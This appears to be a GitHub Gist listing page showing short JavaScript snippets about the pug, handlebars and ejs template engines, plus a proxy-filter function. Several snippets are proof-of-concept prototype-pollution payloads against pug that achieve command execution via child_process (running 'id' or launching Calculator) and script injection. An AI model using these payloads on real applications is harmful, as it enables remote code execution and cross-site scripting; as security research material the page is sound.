rayepeng
/ vmess-美国节点.js
Created
July 5, 2023 09:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function filter(proxies) { | |
| return proxies.map(p => { | |
| return p.type === "vmess" && p.name.indexOf("美国") !== -1; | |
| }); | |
| } |
rayepeng
/ exploit.json
Created
June 8, 2023 06:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "song.name": "The Goose went wild", | |
| "__proto__.block":{ | |
| "type":"Text", | |
| "line":"process.mainModule.require('child_process').exec('/System/Applications/Calculator.app/Contents/MacOS/Calculator')" // RCE here!!! | |
| } | |
| } |
rayepeng
/ pug xss.js
Created
June 8, 2023 06:56
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const pug = require('pug'); | |
| Object.prototype.block = {"type":"Text","line":`console.log(process.mainModule.require('child_process').execSync('id').toString())`}; | |
| const source = `h1= msg`; | |
| var fn = pug.compile(source, {}); | |
| var html = fn({msg: 'It works'}); | |
| console.log(html); |
rayepeng
/ fuction walkAST.js
Created
June 8, 2023 05:07
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function walkAST(ast, before, after, options){ | |
| parents.unshift(ast); | |
| switch (ast.type) { | |
| case 'NamedBlock': | |
| case 'Block': | |
| ast.nodes = walkAndMergeNodes(ast.nodes); | |
| break; | |
| case 'Case': |
rayepeng
/ AST demo.json
Created
June 8, 2023 05:06
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "type":"Block", | |
| "nodes":[ | |
| { | |
| "type":"Tag", | |
| "name":"h1", | |
| "selfClosing":false, | |
| "block":{ | |
| "type":"Block", | |
| "nodes":[ |
rayepeng
/ compiled js.js
Created
June 8, 2023 05:05
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (function anonymous(pug | |
| ) { | |
| function template(locals) {var pug_html = "", pug_mixins = {}, pug_interp;var pug_debug_filename, pug_debug_line;try {; | |
| var locals_for_with = (locals || {}); | |
| (function (msg) { | |
| ;pug_debug_line = 1; | |
| pug_html = pug_html + "\u003Ch1\u003E"; | |
| ;pug_debug_line = 1; | |
| pug_html = pug_html + (pug.escape(null == (pug_interp = msg) ? "" : pug_interp)) + "\u003Cscript\u003Ealert(origin)\u003C\u002Fscript\u003E\u003C\u002Fh1\u003E"; |
rayepeng
/ untitled snippet.js
Created
June 8, 2023 05:03
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const pug = require('pug'); | |
| Object.prototype.block = {"type":"Text","val":`<script>alert(origin)</script>`}; | |
| const source = `h1= msg`; | |
| var fn = pug.compile(source, {}); | |
| var html = fn({msg: 'It works'}); | |
| console.log(html); // <h1>It works<script>alert(origin)</script></h1> |
rayepeng
/ handlebars demo.js
Created
June 8, 2023 05:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // npm install handlebars | |
| const handlebars = require('handlebars'); | |
| // define template | |
| const template = ` | |
| <h1>Hello, {{name}}!</h1> | |
| `; | |
| // more progress, compile template |
rayepeng
/ pug demo.js
Created
June 8, 2023 05:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // npm install pug | |
| const pug = require('pug'); | |
| // definte template | |
| const template = ` | |
| h1 Hello, #{name}! | |
| `; | |
| // compilte template |
rayepeng
/ ejs demo.js
Created
June 8, 2023 04:55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // npm install ejs | |
| const ejs = require('ejs'); | |
| // define our template | |
| const template = ` | |
| <h1>Hello, <%= name %>!</h1> | |
| `; | |
| // render it |
NewerOlder